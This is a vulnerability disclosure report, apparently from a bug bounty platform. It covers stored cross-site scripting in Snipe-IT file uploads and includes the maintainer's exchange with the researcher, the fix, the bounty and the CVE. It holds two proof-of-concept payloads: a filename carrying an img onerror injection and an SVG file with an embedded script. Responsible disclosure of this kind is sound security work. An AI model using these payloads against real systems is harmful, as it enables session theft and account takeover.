Cross-site Scripting (XSS) - Generic in snipe/snipe-it

Valid

Reported on

Oct 5th 2021


Description

At File Uploads allows for arbitrary execution of JavaScript

Step to Reproduct

XSS at filename

Goto detail of one asset

At tab File choose to upload file with filename contain payload: file'><img src=x onerror=alert(1)>name

XSS when upload file .svg (In list file types are allowed don't have file .svg)

Goto detail of one asset

At tab File choose to upload file svg with contain payload:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>

When uploaded, click to download

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the snipe/snipe-it team and are waiting to hear back 2 months ago
snipe
2 months ago

Maintainer


Hi - thanks for this. I'm unclear on how this actually works IRL tho. We force a download for uploaded files, which means you'd have to download it. Which means any image editor it would nullify any javascript and any sessions attached to it.

If you can provide me with a little more detail on how you're seeing this work in the wild (screenshots would be great) we can take a look.

lethanhphuc
2 months ago

Researcher


Yes, You can check video poc here PoC

snipe
2 months ago

Maintainer


Thanks so much - we’ll have a patch out shortly.

snipe validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
snipe
2 months ago

Maintainer


I have a PR up against master right now, it's just awaiting QA finals

snipe confirmed that a fix has been merged on fc5efd 2 months ago
snipe has been awarded the fix bounty
lethanhphuc
2 months ago

Researcher


Thanks for the reward

Jamie Slome
a month ago

Admin


CVE published! 🎊

snipe
a month ago

Maintainer


🎉🎉😭🤣